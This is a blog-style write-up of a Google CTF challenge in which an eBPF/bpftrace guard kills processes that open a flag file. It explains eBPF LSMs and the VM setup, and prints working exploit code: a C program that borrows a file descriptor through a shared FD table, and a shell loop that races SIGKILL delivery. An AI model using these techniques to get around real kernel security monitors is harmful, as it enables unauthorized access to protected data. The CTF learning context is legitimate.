Shiv After Dark

eBPF, Race Conditions and Soham Parekh

I
This is a somewhat random write-up for a recent CTF hosted by Google (also my very first). In the days following the CTF, the 2025 Soham Parekh fiasco unfolded, and I couldn't help but notice a few parallels between the two events: at their core, the nature of the exploit is the same.

First, some context:

  1. A Capture The Flag (CTF) is an event with several problems, each hiding a string of the format "CTF{some-fun-message}" that you need to find. The more strings you find, the higher you rank.
  2. The Soham Parekh fiasco: it's a rabbit hole, but the tl;dr is that this guy managed to land multiple simultaneous jobs at respectable(?) tech companies and eventually got caught.

I'll connect the dots at the end if I have the time.

II
What is BPF?
BPF stands for Berkeley Packet Filter; its modern, extended form is eBPF. BPF was originally meant for filtering network packets, but eBPF has since been extended to do far more, including implementing Linux security modules.
What is an LSM?
The Linux Security Module (LSM) framework enables the implementation of different security policies through kernel-level access controls in Linux systems. With recent kernel versions, small LSM policies can be implemented as eBPF programs attached to LSM hooks.
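
For a concrete picture, here is a minimal sketch of what such a policy looks like in C, in the style of the upstream libbpf examples (compiled with clang for the BPF target and loaded via libbpf). This is purely illustrative and not the challenge's guard, which is a bpftrace script shown later; the inode number is a made-up placeholder.

/* deny_open.bpf.c: a toy eBPF LSM policy that denies open() on one inode.
   Needs a kernel with CONFIG_BPF_LSM and "bpf" in the lsm= boot list. */
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

#define EPERM 1 /* errno.h clashes with vmlinux.h, so define it by hand */

char LICENSE[] SEC("license") = "GPL";

SEC("lsm/file_open")
int BPF_PROG(deny_secret_open, struct file *file)
{
    /* 1234 is a placeholder inode number for illustration */
    if (file->f_inode->i_ino == 1234)
        return -EPERM; /* veto this open() */
    return 0;          /* allow everything else */
}

Unlike the challenge's guard, which SIGKILLs the caller after the fact, a real LSM program like this vetoes the operation synchronously by returning an error from the hook. That difference is exactly what the winning exploit abuses later.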

The challenge: MISC-BPFBOX

The challenge description is just this:

I heard people can write LSMs using BPF, so I built one.

As a complete beginner to CTFs, this almost made me give up on the spot. However, I decided to lock in and dive deep. When you download the attachment for the challenge and unzip it, you get this:

❯ tree .
.
├── Dockerfile
├── flag.txt
├── flake.lock
├── flake.nix
├── ham.sh
├── init
│   ├── go.mod
│   └── main.go
└── run_qemu

Ok? There is no README.md or any other documentation, so you gotta go through the codebase and figure out what is happening. Without going into too many details, the three important hints are in these files:

  1. flag.txt
CTF{this isn't a flag}

The content is a dummy, but this literally tells us where the flag lives in the VM: /flag.txt.

  2. run_qemu
#!/usr/bin/env bash
exec qemu-system-x86_64 -serial mon:stdio -nographic -cpu host -m 1024 -accel kvm -kernel /bzImage -initrd /initrd.gz -append "console=ttyS0 quiet"

We are dropped inside some sort of VM.

  3. init/main.go
// init/main.go line 15:33
const probeText = `
BEGIN {
 printf("ready\n")
}

fentry:vmlinux:security_create_user_ns {
 signal(KILL);
}
 
fentry:vmlinux:security_file_open {
 $inode = args->file->f_inode;
 $d = $inode->i_sb->s_dev;
 $i = $inode->i_ino;

 if ($d == $1 && $i == $2) {
  signal(KILL);
 }
}
`

There is a "guard process," i.e. the eBPF LSM running as root that is monitoring the VM. The guard will kill any attempts at: a) opening the flags.txt file descriptor and b) increasing your privilege level

So, to summarize the challenge, it is just this:

  1. You are dropped inside a VM
  2. Your goal is to read the flag.txt file
  3. You are the least privileged user in this VM with uid 99999 and gid 99999. Think of it as a clear, out-of-the-way identifier that guarantees zero built-in privileges. Root is uid and gid 0.
  4. Any attempt to open flag.txt or to create a new user namespace gets the offending process killed by the "guard process".

Next, I want to inspect the environment to get a feel for what works and what does not. The next section will only cover how to bring up a testing environment and can be completely skipped.

III

First, to get inside the virtual machine hosted by Google, you have to run this:

nc bpfbox.2025.ctfcompetition.com 1337

This command asks you to provide proof of work to actually enter a VM:

== proof-of-work: enabled ==
please solve a pow first
You can run the solver with:
    python3 <(curl -sSL https://goo.gle/kctf-pow) solve <some_key>
===================

Running that solver script produces a proof-of-work solution, and submitting it lets you inside the VM. However, there is a catch: you only have 60 seconds to do anything inside the VM. Then you get kicked out.

    /bin/sh: can't access tty; job control turned off
~ $ command failed: signal: killed
[   61.347266] reboot: Power down

real    1m2.069s
user    0m0.051s
sys     0m0.065s

Thankfully, the zip we downloaded comes with a Dockerfile that we can use to build our own custom VM and get rid of that timeout. More on that in the next section, but even building the VM was tricky.

I use a MacBook Air with an Apple M2 chip, but run_qemu calls the qemu-system-x86_64 binary with the -accel kvm flag, and KVM is not available on my MacBook. KVM is the Linux kernel module that user-space tools such as QEMU or Firecracker talk to (via /dev/kvm) when they want hardware-accelerated virtualization. So I booted up a c6a.large instance running Ubuntu and found out the hard way that this would ALSO not give me /dev/kvm: a c6a.large is a virtual instance running on a slice of an AMD Milan host under the Nitro hypervisor, which deliberately hides VT-x/AMD-V, so the guest kernel refuses to load KVM and /dev/kvm never shows up. On a cloud provider you only get those extensions on "metal" instances, so I had to use a c6a.metal to build the VM with hardware acceleration.

Here is a simple mental model generated using an LLM:

                 c6a.large  (virtual instance)
                 ────────────────────────────
      ┌───────────────┐
      │ Guest kernel  │        Linux / Windows
      └───────┬───────┘
              │  /dev/kvm = ✗   ← AMD-V not exposed
      ┌───────┴───────┐
      │ QEMU -enable  │        falls back to **TCG**
      │      (TCG)    │
      └───────┬───────┘
              │  VM-exit
      ┌───────┴───────┐
      │ Nitro HV      │        traps everything, shares host
      └───────┬───────┘
              │
      ┌───────┴───────┐
      │ EPYC Milan    │        real silicon
      └───────────────┘



                 c6a.metal  (bare-metal)
                 ───────────────────────
      ┌───────────────┐
      │ Guest kernel  │        you own the box
      └───────┬───────┘
              │  /dev/kvm = ✔
      ┌───────┴───────┐
      │ QEMU -enable  │        runs with **KVM**
      │      (KVM)    │
      └───────┬───────┘
              │  VM-exit (direct)
      ┌───────┴───────┐
      │ EPYC Milan    │        no hypervisor layer
      └───────────────┘

tl;dr use a .metal and not a virtual instance:

Instance type: c6a.metal
OS: ubuntu/images/hvm-ssd-gp3/ubuntu-noble-24.04-amd64-server-20250610

What is "KVM"?

A Linux kernel module that exposes CPU virtualization extensions (Intel VT-x, AMD-V, etc.) to user-space.

What is the difference between a metal and a virtual instance?

Virtual = Guest ➜ Nitro ➜ CPU (partly virtualized access to perf counters / SR-IOV / MSRs)

Metal = Guest ➜ CPU (Full native access to Perf counters / SR-IOV / MSRs)
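
If you want to check an instance yourself, here is a tiny C sketch (my own illustration, not part of the challenge) that performs the same probe QEMU effectively does before it can honor -accel kvm:

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/kvm.h>

int main(void)
{
    /* On a virtual instance (c6a.large) this open() fails: Nitro hides
       AMD-V, the kvm module never loads, and /dev/kvm never appears. */
    int fd = open("/dev/kvm", O_RDWR | O_CLOEXEC);
    if (fd < 0) {
        perror("open /dev/kvm");
        return 1;
    }

    /* On a .metal instance this prints the stable KVM API version (12). */
    printf("KVM API version: %ld\n", (long)ioctl(fd, KVM_GET_API_VERSION, 0));
    close(fd);
    return 0;
}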

To set up the instance, build the VM image, and enter it, run the following:

sudo su
apt-get update
apt-get install -y docker.io qemu-system unzip
wget https://storage.googleapis.com/2025-attachments/bf17a3af285b9346a35fddd9b3208f2eb20fefa5bcacb9a6dc896de4ed26b032b35dd286540c22272eda14cc8863cc727c2ad422dbd8bf61520a94e403e1a2ee.zip

unzip bf17a3af285b9346a35fddd9b3208f2eb20fefa5bcacb9a6dc896de4ed26b032b35dd286540c22272eda14cc8863cc727c2ad422dbd8bf61520a94e403e1a2ee.zip
cd misc-bpfbox/
chmod +x run_qemu
docker build -t bpfbox .
docker run --rm -it --privileged bpfbox /run_qemu

IV

We'll start probing our VM environment and see what we can do. First, let's give ourselves a bit more time to look around inside the VM. I temporarily apply this patch to increase the timeout from one minute to one hour:

diff --git a/init/main.go b/init/main.go
index 38e7720..47999ee 100644
--- a/init/main.go
+++ b/init/main.go
@@ -121,7 +121,7 @@ func shutdown() error {
 }
 
 func spawnShell(ctx context.Context) error {
-       withTimeout, cancel := context.WithTimeout(ctx, time.Minute)
+       withTimeout, cancel := context.WithTimeout(ctx, time.Hour)
        defer cancel()
 
        cmd := exec.CommandContext(withTimeout, "/bin/sh")

Ok, now here is what the VM has:

/bin/sh: can't access tty; job control turned off
~ $ ls
bin       flag.txt  nix       root      tmp
dev       init      proc      sys       var
~ $ id
uid=99999 gid=99999
~ $ ps
PID   USER     TIME  COMMAND
    1 0         0:00 /init
    2 0         0:00 [kthreadd]
    3 0         0:00 [pool_workqueue_]
    4 0         0:00 [kworker/R-kvfre]
    5 0         0:00 [kworker/R-rcu_g]
    6 0         0:00 [kworker/R-sync_]
    7 0         0:00 [kworker/R-slub_]
    8 0         0:00 [kworker/R-netns]
    9 0         0:00 [kworker/0:0-pm]
   10 0         0:00 [kworker/0:1-eve]
   11 0         0:00 [kworker/0:0H-ev]
   12 0         0:00 [kworker/u4:0-ev]
   13 0         0:00 [kworker/u4:1-ev]
   14 0         0:00 [kworker/R-mm_pe]
   15 0         0:00 [rcu_tasks_kthre]
   16 0         0:00 [rcu_tasks_rude_]
   17 0         0:00 [rcu_tasks_trace]
   18 0         0:00 [ksoftirqd/0]
   19 0         0:00 [rcu_preempt]
   20 0         0:00 [rcu_exp_par_gp_]
   21 0         0:00 [rcu_exp_gp_kthr]
   22 0         0:00 [migration/0]
   23 0         0:00 [idle_inject/0]
   24 0         0:00 [cpuhp/0]
   25 0         0:00 [kdevtmpfs]
   26 0         0:00 [kworker/R-inet_]
   27 0         0:00 [kauditd]
   28 0         0:00 [khungtaskd]
   29 0         0:00 [oom_reaper]
   30 0         0:00 [kworker/u4:2-ev]
   31 0         0:00 [kworker/R-write]
   32 0         0:00 [kcompactd0]
   33 0         0:00 [ksmd]
   34 0         0:00 [khugepaged]
   35 0         0:00 [kworker/R-kinte]
   36 0         0:00 [kworker/R-kbloc]
   37 0         0:00 [kworker/R-blkcg]
   38 0         0:00 [irq/9-acpi]
   39 0         0:00 [kworker/R-devfr]
   40 0         0:00 [kworker/0:1H]
   41 0         0:00 [kswapd0]
   42 0         0:00 [kworker/R-kthro]
   43 0         0:00 [kworker/R-mld]
   44 0         0:00 [kworker/R-ipv6_]
   46 0         0:00 [kworker/u4:3-ev]
   52 0         0:00 [kworker/R-kstrp]
   53 0         0:00 [kworker/u5:0]
   57 0         0:00 /bin/bpftrace --unsafe -e  BEGIN {  printf("ready\n") }  f
   64 0         0:00 [kworker/0:2]
   65 99999     0:00 /bin/sh
   69 99999     0:00 ps

As expected, the shell runs as user 99999, and any attempt to cat flag.txt simply gets the process killed.

There are two exploit ideas for this challenge. The first is more of a misdirection and turned out not to be feasible here, but the second is the real solution. I'll explain both next.

V

After researching some previous eBPF-related CTF write-ups, a common exploit emerged around "borrowing file descriptors (FDs)". The exploit is roughly this:

  1. The parent clones a child that shares its FD table; the child opens the flag and gets killed by the LSM.
  2. The parent survives with the now-forbidden descriptor still sitting in the shared table.
  3. Hunt for that descriptor and dump flag.txt.

I honestly do not know much C/C++, so I vibe-coded this exploit:

#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

static void die(const char *m) { perror(m); exit(1); }

static int child_fn(void *arg)
{
    int fd = open("/flag.txt", O_RDONLY); /* BPF program will kill this task */
    (void)fd;                             /* parent inherits the descriptor  */
    pause();                              /* never returns; SIGKILL lands here */
    return 0;
}

int main (void)
{
    /* 1. create a pipe just to occupy FDs 3 and 4, so the flag likely ends
          up at FD 5; not strictly required, just makes the scan deterministic */
    int pipefd[2];
    if (pipe(pipefd)) die("pipe");

    /* 2. clone a child that *shares* our file-descriptor table */
    const int stack_sz = 64 * 1024;
    char *stack = malloc(stack_sz);
    if (!stack) die("malloc");

    pid_t pid = clone(child_fn, stack + stack_sz,
                      CLONE_FILES | SIGCHLD, NULL);
    if (pid < 0) die("clone");

    /* 3. wait until the child is dead (SIGKILL from the LSM) */
    waitpid(pid, NULL, 0);

    /* 4. scan FDs 5..255, read first 256-byte chunk that looks printable      */
    char buf[256];
    for (int fd = 5; fd < 256; fd++) {
        ssize_t n = pread(fd, buf, sizeof buf - 1, 0);
        if (n <= 0) continue;
        /* crude check: must start with "CTF{" (change if organisers use other
           prefix) and be printable ASCII                              */
        if (n >= 4 && !memcmp(buf, "CTF{", 4)) {
            buf[n] = '\0';
            write(STDOUT_FILENO, buf, n);
            write(STDOUT_FILENO, "\n", 1);
            return 0;
        }
    }

    fprintf(stderr, "[-] flag FD not found; kernel behaviour differs?\n");
    return 1;
}

I baked this exploit into the local VM, and it worked on the first try. This also made me ridiculously bullish on LLMs and vibe-coding, cuz a complete noob, like me, now has the ability to develop complex exploits just by talking to an LLM. This also pushed my P(doom) to ~99%.

Anyway, I spent an embarrassing amount of time trying to figure out a way to get this binary inside the actual CTF VM. I was convinced that this was the perfect exploit and that I would get the flag as soon as I could execute the binary on the VM. I tried several things: downloading the binary from inside the VM, copy-pasting a base64 encoding of the binary into the VM and decoding it there, etc. Nothing worked, so I had to go back to the drawing board. That takes us to the second exploit:

VI

After an ungodly amount of time spent talking to LLMs, I started to develop another exploit, this time with a deeper understanding of what the kernel is doing. LSM provides a "hook" mechanism that BPF programs can use to implement a security gate. In this case, we have two hooks: one fires when someone opens a file, and one fires when someone creates a user namespace. The BPF program detects these attempts and kills any process performing either one.

We saw above that, inside the VM, there is basically just one BPF program running.

Now, every time someone tries to open the flag.txt file, the BPF program detects the attempt and sends a SIGKILL; if several processes try to open the file, all of them get issued a SIGKILL. So if we spawn multiple processes that attempt to open the file, and any one of them manages to read the flag before its SIGKILL is delivered, we get to see the flag. The SIGKILL can land late because signal delivery is asynchronous, and kernel scheduling and execution get loaded down when many processes are spawned at once.

Finally, the exploit is just this:

for i in 1 2 3 4 5; do
    (
        timeout 1 head -c 256 /flag.txt 2>/dev/null | grep "CTF{" 2>/dev/null
    ) &
done
wait

You can paste this directly inside the VM and, boom, you get the flag:

CTF{En0ugH_r4c3_c0nd1tIoNs_T0_H05t_O1yMp1c5}
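
For clarity, here is the same race written out in C. This is a sketch of my mental model, not something I could actually run on the remote (recall that I never managed to get binaries into the VM); the fork count of 16 is arbitrary:

#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    for (int i = 0; i < 16; i++) {
        if (fork() == 0) {
            /* Child: this open() triggers the guard's SIGKILL, but the
               signal is delivered asynchronously... */
            char buf[256];
            int fd = open("/flag.txt", O_RDONLY);
            ssize_t n = (fd >= 0) ? read(fd, buf, sizeof buf) : -1;
            /* ...so sometimes we reach this write() before we die. */
            if (n > 0)
                write(STDOUT_FILENO, buf, (size_t)n);
            _exit(0);
        }
    }
    while (wait(NULL) > 0)
        ; /* reap the children; most were SIGKILLed mid-flight */
    return 0;
}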
VII

The above exploit suddenly made me aware of the time that exists "between" the issuing of a SIGKILL and the death of a process. Computers are super fast, so it is tempting to think of this as an instantaneous transition with no gap in between, but these gaps exist. A malicious program does not need to live forever to finish its exploit. To draw parallels between this CTF and Soham Parekh, the way I see it is:

  1. LSM policy = the employment contract Soham signed with each company, i.e., terminate Soham's employment if he is found working for multiple startups at the same time.
  2. eBPF program = the HR/background check/anonymous tip that would reveal that Soham is "moonlighting".
  3. SIGKILL issued = Suhail's tweet bringing attention to Soham's hack, before his contract was terminated by every one of his employers.

The point of this post is to get back into the habit of documenting my technical deep-dives and the new things I've been learning.

#bpf #ctf #exploit #linux #llm #lsm #meta #parekh #soham #soham parekh #yc